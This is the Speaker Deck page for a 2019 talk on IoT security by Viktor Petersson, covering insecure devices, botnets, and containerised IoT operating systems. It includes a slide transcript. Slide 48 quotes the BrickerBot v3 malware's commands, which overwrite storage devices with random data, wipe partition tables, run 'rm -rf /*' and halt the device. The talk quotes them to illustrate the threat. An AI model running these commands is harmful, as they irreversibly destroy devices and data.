Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The "S" in "IoT" stands for "Security"

Viktor Petersson
October 28, 2019
Technology
0
140

The "S" in "IoT" stands for "Security"

IoT security isn't rocket surgery, but a race to market has left a proliferation of insecure, unpatchable devices strewn across the internet. Well-established software delivery and security best practices are routinely ignored, and a series of laughable breaches has left users and governments scrabbling for better solutions.

Recent advances in IoT-friendly hardware have expanded the options available to manufacturers, and paved the road to lightweight containerisation of connected devices. This talk will discuss the current state of the art in consumer and industrial IoT device security, examine some recent vulnerabilities, breaches, and attacks, and explore how to use containers to secure devices from current and future threats.

Viktor Petersson

October 28, 2019
Tweet

More Decks by Viktor Petersson

See All by Viktor Petersson
The history of how Screenly OSE became the most popular digital signage project on GitHub
vpetersson
0
110
The DevSecOps Iceberg @ Cloud Native London
vpetersson
0
230
What's mtLS? @ Docker London
vpetersson
0
350
Living on the Edge @ Kubernetes London
vpetersson
0
94
The 'S' in IoT Stands for Security (a.k.a. Internet of Shit)
vpetersson
0
240
Lessons learned from Screenly @ Linuxing in London
vpetersson
0
170
Provisioner @ Ansible London
vpetersson
0
8.9k
Screenly @ IoT London
vpetersson
1
6.9k
IoT Use Case: Screenly
vpetersson
0
140

Other Decks in Technology

See All in Technology
Technologists around the campfire: Social audio as a vector for engineering wisdom
bcantrill
0
270
サーバーレスサービスの特徴と アプリケーションの考え方 / Characteristics of serverless services and Concept of application
_kensh
0
120
Snowflake リーダーアカウントを利用したデータ共有について
bergkamp
0
120
Snowflake×dbt×Terraformでモダンなデータ基盤開発してみた
kevinrobot34
0
270
0518LLMmeetup_LLMシステムの非機能要件対応_現場レポート.pdf
hirosatogamo
5
3.7k
周りが強すぎて現実逃避でOSS活動始めた結果
bun913
0
450
『AWSではじめるクラウドセキュリティ』の裏側を。
ryohatanmonolog
2
160
Get started with OSS contributions
sinsoku
2
510
Semantic Kernel LT
takashi1029
1
210
ChatGPTがもたらす新しいチーム開発の現場
satoshirobatofujimoto
0
140
GPTによる薬歴の自動生成のPoC
pharma_x_tech
1
630
テスト設計チュートリアル/Test Design Tutorial
goyoki
5
3.9k

Featured

See All Featured
Building a Scalable Design System with Sketch
lauravandoore
451
31k
Fashionably flexible responsive web design (full day workshop)
malarkey
395
64k
A Modern Web Designer's Workflow
chriscoyier
689
190k
Product Roadmaps are Hard
iamctodd
39
8.1k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
25
5.3k
Web Components: a chance to create the future
zenorocha
304
41k
Build your cross-platform service in a week with App Engine
jlugia
222
17k
Keith and Marios Guide to Fast Websites
keithpitt
407
21k
What's in a price? How to price your products and services
michaelherold
234
10k
Designing for humans not robots
tammielis
245
24k
Art Directing for the Web. Five minutes with CSS Template Areas
malarkey
197
11k
StorybookのUI Testing Handbookを読んだ
zakiyama
9
3.5k

Transcript

  1. View Slide

  2. Internet of Shit
    The ”S” in “IoT” stands for ”Security”

    View Slide

  3. I’m:
    - Andy
    - Dev-like
    - Sec-ish
    - Ops-y

    View Slide

  4. View Slide

  5. Viktor (@vpetersson)
    ● Entrepreneur, geek, tinkerer
    ● Jack-of-all-trades
    ● Cofounder of
    ○ Screenly (screenly.io)
    ○ WoTT (wott.io)
    ○ (and a few other things)

    View Slide

  6. What’s WoTT?
    ● Enable DevSecOps
    ● Gamify security
    ● Provide visibility and alerting
    ● Started in IoT, now on edge devices and servers

    View Slide

  7. © xkcd
    The sad state of ”smart” devices

    View Slide

  8. “The Internet of Things is a science
    project focused on creating the most
    complex way possible of turning the
    lights on.”
    @domguinard

    View Slide

  9. View Slide

  10. View Slide

  11. View Slide

  12. View Slide

  13. View Slide

  14. View Slide

  15. View Slide

  16. View Slide

  17. https://www.theregister.co.uk/2016/03/25/vnc_roulette/
    https://www.tomsguide.com/us/pictures-story/748-vnc-roulette-slideshow.html#s12

    View Slide

  18. What This Talk is About
    ● IoT: The State of the Art
    ● How Containers and Kernel Technologies Can Help
    ● Botnets and Brickerbots
    ● Building Better Devices

    View Slide

  19. IoT: The State of the Art

    View Slide

  20. https://www.wired.com/2016/08/jeep-hackers-return-high-speed-steering-acceleration-hacks/

    View Slide

  21. http://money.cnn.com/2017/01/09/technology/fda-st-jude-cardiac-hack/

    View Slide

  22. View Slide

  23. View Slide

  24. View Slide

  25. View Slide

  26. View Slide

  27. View Slide

  28. How We Think IoT Devices Run

    View Slide

  29. How IoT Devices Actually Run

    View Slide

  30. View Slide

  31. Blockchain all da thingz!

    View Slide

  32. Why do IoT devices get compromised?
    ● Default credentials
    ● Poor, or non-existent, update cycles
    ● Insecure services exposed to the network (telnet, ftp, etc)
    ● No isolation or hardening
    ● Manufacturers not using common sense

    View Slide

  33. IoT Devices vs Servers
    ● IoT devices are getting more powerful
    ● More and more are running Linux
    ○ Except many battery-powered devices
    ● This means we are deploying general purpose computers into...everything
    ○ Moore’s law at play
    ● ...the line is getting blurry between IoT and traditional compute

    View Slide

  34. Securing Servers 101
    ● What services are running?
    ○ Do we need all of them?
    ○ Are any of them publicly exposed on the network?
    ● Is everything configured with least privilege?
    ● Are we using process isolation to limit the blast radius of a breach?
    ● Is everything encrypted in transit? At rest?
    ● Is the firewall configured?
    ● Are there any packages installed with known vulnerabilities?
    ● Are we conformant to documented best practice (CIS, OWASP, et. al.)?
    ● How do we monitor if any of this changes?

    View Slide

  35. Securing IoT Devices 101

    View Slide

  36. Sham
    eless self-plug

    View Slide

  37. Containers and IoT

    View Slide

  38. Containers to the Rescue!
    Containers to the Rescue!

    View Slide

  39. Modern IoT Operating Systems

    View Slide

  40. ● “git push master balena”
    ● Application isolated
    ● Isolation tool: Docker/BalenaEngine

    View Slide

  41. View Slide

  42. ● Smaller footprint than “Classic”
    ● Lots of “read-only” and kernel magic
    ● Interfaces, slots and plugs
    ● Snaps, Docker and LXD
    ● Self-updating
    ● Isolation tool (primary): AppArmor

    View Slide

  43. View Slide

  44. ● Everything is a “snap” (including the OS)
    ● Transactional, cryptographically signed, updates
    ● Default permission is nill (or almost)
    ● Permission must be granted explicitly
    ○ E.g. network access, ports etc

    View Slide

  45. - Trusted Domain
    https://developer.ubuntu.com/static/resources/ubuntu-core-16-security-whitepaper.pdf

    View Slide

  46. https://www.networkworld.com/article/3128372/internet-of-things/ddos-at
    tacks-using-iot-devices-follow-the-manchurian-candidate-model.html

    View Slide

  47. View Slide

  48. # BrickerBot v3 device logic
    $ busybox cat /dev/urandom >/dev/mtdblock0 &
    $ busybox cat /dev/urandom >/dev/sda &
    $ busybox cat /dev/urandom >/dev/mtdblock10 &
    $ busybox cat /dev/urandom >/dev/mmc0 &
    $ busybox cat /dev/urandom >/dev/sdb &
    $ busybox cat /dev/urandom >/dev/ram0 &
    $ busybox cat /dev/urandom >/dev/mtd0 &
    $ busybox cat /dev/urandom >/dev/mtd1 &
    $ busybox cat /dev/urandom >/dev/mtdblock1 &
    $ busybox cat /dev/urandom >/dev/mtdblock2 &
    $ busybox cat /dev/urandom >/dev/mtdblock3 &
    $ fdisk -C 1 -H 1 -S1 /dev/mtd0
    w
    $ fdisk -C 1 -H 1 -S1 /dev/mtd1
    w
    $ fdisk -C 1 -H 1 -S1 /dev/sda
    w
    $ fdisk -C 1 -H 1 -S1 /dev/mtdblock0
    w
    $ route del default;iproute del default;ip route del default; rm -rf /* 2>/dev/null & sysctl -w
    net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1
    $ halt -n -f
    $ reboot

    View Slide

  49. How do we get vendors to give a shit?

    View Slide

  50. Defence Against the Dark Botnets

    View Slide

  51. View Slide

  52. View Slide

  53. View Slide

  54. View Slide

  55. IPv6
    IPv6

    View Slide

  56. IPv6

    View Slide

  57. Building Better IoT Devices

    View Slide

  58. View Slide

  59. Device life cycle

    View Slide

  60. Common mistakes

    View Slide

  61. Designing Better IoT Devices

    View Slide

  62. Lessons learned from Screenly

    View Slide

  63. Screenly 1 Player
    + + + +

    View Slide

  64. Screenly 2 Player criteria
    ● Disk images built on CI
    ● Process isolation (perhaps using containers)
    ● Transactional updates (app and OS)
    ○ Automatic roll-back
    ● Not having to manage the OS layer ourselves
    ○ Must be locked down/Hardened by default
    ● Bonus: Cryptographically signed updates

    View Slide

  65. Screenly 2 Player
    + +

    View Slide

  66. Recap

    View Slide

  67. Conclusion
    ● Everything is now a computer
    ○ Whatever that means...
    ● IoT security is an afterthought at best
    ● The new breed of containerised IoT platforms greatly enhance the update
    and security story
    ● This problem is bigger than all of us: legislation, class action, or revolt is
    required! This should be supported by financial incentives
    ● We can fix life cycle and runtime security
    ● Go forth and patch your devices!

    View Slide

  68. @sublimino
    @controlplaneio
    @vpetersson
    @wottsecurity

    View Slide